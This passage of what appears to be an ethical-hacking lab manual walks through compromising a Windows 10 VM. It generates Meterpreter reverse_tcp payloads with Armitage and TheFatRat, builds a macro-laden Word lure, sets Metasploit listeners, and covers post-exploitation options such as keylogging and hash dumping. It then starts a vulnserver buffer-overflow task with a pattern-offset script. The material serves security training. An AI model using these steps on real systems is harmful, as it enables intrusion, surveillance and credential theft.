22. The windows/meterpreter/reverse_tcp window appears. Scroll down to the LPORT option and change the port value to 444. Ensure that the multi/handler option is selected in the Output field; click Launch. Metasploit's default LPORT is 4444, so this change is required: the handler must listen on the same port (444) that was compiled into malicious_payload.exe in step 16.

Figure 1.5.15: windows/meterpreter/reverse_tcp settings

23. Now, switch to the Windows 10 virtual machine and open any web browser (here, Mozilla Firefox).
In the address bar, type http://10.10.10.13/share and press Enter. As soon as you press Enter, the system will display the shared folder contents, as shown in the screenshot.
Note: Here, we are sending the malicious payload through a shared directory; in a real engagement, it could instead be sent as an email attachment or through physical means such as a hard drive or pen drive.
24. Click malicious_payload.exe to download the file.
Note: 10.10.10.13 is the IP address of the host machine (here, the Parrot Security virtual machine).

[Screenshot: Index of /share listing malicious_payload.exe (250K) and Test.exe (72K), served by Apache 2.4.38 (Debian) at 10.10.10.13 port 80]

Figure 1.5.16: Downloading the malicious exe file on the victim's system

Task 5.4: Run the Payload
25. Once you click on the malicious_payload.exe file, the Opening malicious_payload.exe pop-up appears; select Save File.
26. The malicious file will be downloaded to the browser's default download location (here, Downloads). Now, double-click malicious_payload.exe to run the file.

Figure 1.5.17: Malicious file successfully downloaded

27. The Open File - Security Warning window appears ("The publisher could not be verified. Are you sure you want to run this software?", Name: C:\Users\Admin\Downloads\malicious_payload.exe, Publisher: Unknown Publisher); click Run.

Figure 1.5.18: Security warning on executing the exe file

28. Leave the Windows 10 virtual machine running and switch to the Parrot Security virtual machine.
29. Observe that one session has been created or opened in the Meterpreter shell, as shown in the screenshot, and the host icon displays the target system name (WINDOWS10).

Task 5.5: Establish a Session
30. Right-click on the target host and navigate to Meterpreter 1 > Interact > Meterpreter Shell.
31. A new Meterpreter 1 tab appears. Type sysinfo and press Enter to view the system details of the exploited system, as shown in the screenshot.
32. Right-click on the target host and navigate to Meterpreter 1 > Explore > Browse Files.
33. A new Files 1 tab and the present working directory of the target system appear. You can observe the files present in the Downloads folder of the target system.
34. Using this option, you can perform various functions such as uploading a file, making a directory, and listing all drives present in the target system. The Files tab offers the buttons Upload,
Make Directory, List Drives, and Refresh.
35. Right-click on the target host and navigate to Meterpreter 1 > Explore > Screenshot.
36. A new Screenshot 1 tab appears, displaying the currently open windows in the target system.
37. Similarly, you can explore other options such as Desktop (VNC), Show Processes, Log Keystrokes, and Webcam Shot.
38. You can also escalate privileges in the target system using the Escalate Privileges option and further steal tokens, dump hashes, or perform other activities.
39. This concludes the demonstration of how to gain access to a remote system using Armitage.
40. Close all open windows and document all the acquired information.

TASK 6: Hack a Windows Machine with a Malicious Office Document using TheFatRat

Here, we will use TheFatRat to hack the Windows machine with a malicious Office document.

Note: Before starting this task, install Microsoft Office on the target virtual machine (Windows 10).

1. In the Parrot Security virtual machine, click the MATE Terminal icon at the top of the Desktop window to open a Terminal window.
2. A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter to run the programs as a root user.
3. In the [sudo] password for attacker field, type toor as the password and press Enter.
Note: The password that you type will not be visible.
4. Now, type cd and press Enter to jump to the root directory.

Task 6.1: Clone TheFatRat
5. In the Parrot Terminal window, type git clone https://github.com/Screetsec/TheFatRat and press Enter.

Note: TheFatRat is an exploitation tool that compiles malware with well-known payloads that can then be executed on Windows, Android, and macOS. The tool creates backdoors and payloads intended to bypass anti-virus software.

Note: You can also access the tool repository from the CEH-Tools folder available in the Windows 10 virtual machine, in case the GitHub link does not exist or you are unable to clone the tool repository. Follow the steps below in order to access the CEH-Tools folder from the Parrot Security virtual machine:
   - Open a file explorer window and press Ctrl+L. The Location field appears; type smb://10.10.10.10 and press Enter to access the Windows 10 shared folders.
   - The security pop-up appears; enter the Windows 10 virtual machine credentials (Username: Admin and Password: Pa$$w0rd) and click Connect.
   - The Windows shares on 10.10.10.10 window appears; navigate to the location CEH-Tools\CEHv11 Module 06 System Hacking\GitHub Tools\ and copy the TheFatRat folder.
   - Paste the copied TheFatRat folder in the location /home/attacker/.
   - In the terminal window, type mv /home/attacker/TheFatRat /root/ and press Enter.

6. After the cloning completes, type cd TheFatRat and press Enter.
7. Type ls and press Enter to view the files in the TheFatRat folder.
8. Now, to run the scripts (fatrat, setup.sh, powerfull.sh) located in the TheFatRat folder, we must give them execute permissions. To do so, use the below commands:
   - chmod +x fatrat and press Enter
   - chmod +x ./setup.sh and press Enter
   - chmod +x ./powerfull.sh and press Enter
Task 6.2: Install TheFatRat
9. Type ./setup.sh and press Enter to begin the installation. Press Enter when the Press [ENTER] key to continue setup message appears.
10. An installation window appears as the system installs the packages required to run TheFatRat.
Note: The installation of packages takes approximately 5 minutes to complete.
Note: If a pop-up asking for permission appears, use the arrow keys on the keyboard to navigate to Yes and press Enter to continue.
11. After the installation completes, the Terminal window appears. Under Select one of the options bellow, type 2 to choose the [2] Install Searchsploit from Kali Repository option and press Enter.
12. Under the prompt ending "...so you can run fatrat from anywhere in your terminal and desktop?", type y and press Enter.
13. After the installation finishes, in the Terminal window, type fatrat and press Enter.

Task 6.3: Make Backdoor File
14. TheFatRat launches and starts to verify the installed dependencies, as shown in the screenshot.
15. A Warning appears, as shown in the screenshot. Press Enter to continue.

Figure 1.6.12: Warning message given by TheFatRat

16. The Metasploit service is not running message appears; press Enter to continue.
17. You may get multiple prompts saying Press [Enter] key to Continue...; do so to continue.
18. TheFatRat menu appears; choose [06] Create Fud Backdoor 1000% with PwnWinds [Excelent] by typing 6 in the menu and pressing Enter.
19. The PwnWinds menu appears. Choose [3] Create exe file with apache + Powershell (FUD 100%) by typing 3 in the menu and pressing Enter.
Note: "FUD" here is only the menu's label. A stock windows/meterpreter/reverse_tcp executable built this way is detected by current Windows Defender signatures, so expect it to be quarantined on a patched target unless real-time protection is turned off there.
20. For Set LHOST IP, type 10.10.10.13 and press Enter.
21. For Set LPORT, type 4444 and press Enter.
22. For the Please enter the base name for output files option, type payload and press Enter.

Figure: Entering the details of the output file

23. For the Choose Payload option, choose [3] windows/meterpreter/reverse_tcp by typing 3 and pressing Enter.
24. The details about the generated payload appear; it is saved at the location /root/Fatrat_Generated. Press Enter to continue.
25. TheFatRat generates a payload.exe file located at /root/Fatrat_Generated, as shown in the screenshot.
26. Now, to go back to the main menu, choose [9] Back to Menu by typing 9 and pressing Enter.

Task 6.4: Make Malicious Word File
27. From the menu, choose [07] Create Backdoor For Office with Microsploit by typing 7 and pressing Enter.
28. The Microsploit menu appears; choose option [2] The Microsoft Office Macro on Windows by typing 2 and pressing Enter.
29. For Set LHOST IP, type 10.10.10.13 and press Enter.
30. For the Set LPORT option, type 4444 and press Enter.
31. For Enter the base name for output files, type BadDoc and press Enter.
32. For Enter the message for the document body (ENTER = default), type YOU HAVE BEEN HACKED !! and press Enter.
33. For the Are u want Use custom exe file backdoor (y/n) option, type y and press Enter.
34. For the Path option, type /root/Fatrat_Generated/payload.exe and press Enter.
35. For the Choose Payload option, choose [3] windows/meterpreter/reverse_tcp by typing 3 and pressing Enter. Use the same payload type and LPORT (4444) as in steps 21 and 23, since the embedded payload.exe was built with them and the listener in Task 6.6 will be set to match.

Task 6.5: Share the Malicious Document File
36. The malicious document details appear, as shown in the screenshot. Press Enter to continue.

Figure 1.6.27: Backdoor created pop-up

37. Navigate to /root/Fatrat_Generated to find the generated document file (BadDoc.docm), as shown in the screenshot.
38. Now, open a new Terminal window, type cp /root/Fatrat_Generated/BadDoc.docm /var/www/html/share, and press Enter to copy the generated malicious document to the shared folder.
Note: Here, we are sending the malicious payload through a shared directory; in a real engagement, it could instead be sent as an email attachment or through physical means such as a hard drive or pen drive.
39. Start the Apache service. To do this, type service apache2 start and press Enter.

Figure 1.6.29: Word file copied to the shared folder
Task 6.6: Set Payload
40. In the Terminal window, launch Metasploit by typing msfconsole and pressing Enter.
41. In msfconsole, type use exploit/multi/handler and press Enter.
42. Now, we need to set the payload, LHOST, and LPORT. To do so, use the below commands:
   - Type set payload windows/meterpreter/reverse_tcp and press Enter
   - Type set LHOST 10.10.10.13 and press Enter
   - Type set LPORT 4444 and press Enter
43. After entering the above details, type exploit and press Enter to start the listener.

Figure 1.6.31: Start the listener

44. Switch to the Windows 10 virtual machine and open any web browser (here, Mozilla Firefox). In the address bar, type http://10.10.10.13/share and press Enter. As soon as you press Enter, the system will display the shared folder contents, as shown in the screenshot.
45. Click BadDoc.docm to download the file.
Note: 10.10.10.13 is the IP address of the host machine (here, the Parrot Security virtual machine).

[Screenshot: Index of /share listing BadDoc.docm (18K) alongside the earlier payloads, served by Apache 2.4.38 (Debian) at 10.10.10.13 port 80]

Figure 1.6.32: Downloading the malicious document on the victim's system

46. Once you click on the BadDoc.docm file, the Opening BadDoc.docm pop-up appears; select Save File.
47. The malicious file will download to the browser's default download location (here, Downloads). Now, double-click the BadDoc.docm file to open it.

Figure 1.6.33: Malicious file successfully downloaded

48.
A Microsoft Word document appears with the file in PROTECTED VIEW. Click Enable Editing, as shown in the screenshot.

Figure 1.6.34: Enabling editing in MS Word

49. A SECURITY WARNING bar appears ("Macros have been disabled."), and the document body shows the lure text "This document was created by a newer version of Microsoft Office. Macros must be enabled to display the contents of the document." Click Enable Content, as shown in the screenshot. This click is what actually runs the embedded VBA macro, which drops and executes payload.exe; nothing happens while the file stays in Protected View or macros remain disabled, which is why the lure text pushes the user to enable them.
50. Now, switch back to the Parrot Security virtual machine and observe that one session is created or opened in the Meterpreter shell, as shown in the screenshot.

Figure 1.6.36: Meterpreter shell access obtained

Task 6.8: View Exploited System Details
51. Type sysinfo and press Enter to view the system details of the exploited computer, as shown in the screenshot.

Figure 1.6.37: Viewing exploited system details using the command line

52. This concludes the demonstration of how to hack a Windows machine with a malicious Office document using TheFatRat.
53. Close all open windows and document all the acquired information.

TASK 7: Perform Buffer Overflow Attack to Gain Access to a Remote System

This task demonstrates the exploitation procedure applied to a vulnerable server running on the victim's system. This vulnerable server is attached to Immunity Debugger. As an attacker, we will exploit this server using a malicious script to gain remote access to the victim's system.

Note: In this task, we use a Parrot Security (10.10.10.13) virtual machine as the host machine and a Windows 10 (10.10.10.10) virtual machine as the target machine.

Task 7.1: Launch Vulnserver
1.
In the Windows 10 virtual machine, navigate to E:\CEH-Tools\CEHv11 Module 06 System Hacking\Buffer Overflow Tools\vulnserver, right-click the file vulnserver.exe, and click the Run as administrator option.
Note: If the User Account Control pop-up appears, click Yes to proceed.

Note: A buffer is an area of adjacent memory locations allocated to a program or application to handle its runtime data. A buffer overflow or overrun is a common vulnerability in applications or programs that accept more data than the allocated buffer can hold. This vulnerability allows the application to exceed the buffer while writing data to it and overwrite neighboring memory locations, including the saved return address on the stack, which is what the rest of this task relies on.
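The standard way to turn a crash like the one this task sets up into control of the instruction pointer is a cyclic pattern: send a string in which every four bytes are unique, read the four bytes that land in EIP in Immunity Debugger, and compute their offset. The shell functions below, an added example that is not from the manual or from vulnserver, reproduce the logic of Metasploit's pattern_create.rb and pattern_offset.rb; the EIP value 386F4337 used in the usage note is a constructed illustration, not a result from the lab.

```shell
#!/bin/sh
# Added example, not from the CEH manual or vulnserver: the cyclic-pattern
# technique for finding how many bytes of input reach EIP in a stack overflow
# like the one this task sets up. Reproduces the logic of Metasploit's
# pattern_create.rb / pattern_offset.rb in shell; the EIP value in the usage
# note is constructed, not a result from the lab.
set -eu

# Build the "Aa0Aa1Aa2...Ab0..." sequence: every 4-byte window is unique for
# the first 20280 bytes, so the 4 bytes that land in EIP identify the offset.
pattern_create() {
  awk -v len="$1" '
    BEGIN {
      u = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; l = "abcdefghijklmnopqrstuvwxyz"; d = "0123456789"
      out = ""
      for (i = 1; i <= 26 && length(out) < len; i++)
        for (j = 1; j <= 26 && length(out) < len; j++)
          for (k = 1; k <= 10 && length(out) < len; k++)
            out = out substr(u, i, 1) substr(l, j, 1) substr(d, k, 1)
      printf "%s", substr(out, 1, len)
    }'
}

# Immunity Debugger shows EIP as a little-endian dword, e.g. 386F4337; turn
# those 8 hex digits back into the 4 ASCII bytes as they sat in the buffer
# (lowest byte first in memory, so the digit pairs are read right to left).
eip_to_ascii() {
  hex="$1"; out=""
  for i in 7 5 3 1; do
    byte=$(printf '%s' "$hex" | cut -c"$i"-"$((i + 1))")
    oct=$(printf '%03o' "$((0x$byte))")
    out="$out$(printf "\\$oct")"
  done
  printf '%s' "$out"
}

# 0-based offset of a 4-character needle in a pattern of the given length;
# returns 1 if it is not there (then EIP was not overwritten by the pattern,
# or a bad character mangled the input before it reached the stack).
pattern_offset() {
  pos=$(pattern_create "$2" | awk -v n="$1" '{ print index($0, n) }')
  [ "$pos" -gt 0 ] || return 1
  echo $((pos - 1))
}
```

Typical use: `pattern_create 3000 > pattern.bin`, send that file as the crashing input, read EIP from Immunity Debugger, then `pattern_offset "$(eip_to_ascii 386F4337)" 3000` prints 2003, meaning 2003 bytes of padding come before the four that overwrite the saved return address. Always confirm the offset by resending with the four bytes at that position set to a recognisable value such as "BBBB" and checking that EIP reads 42424242.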
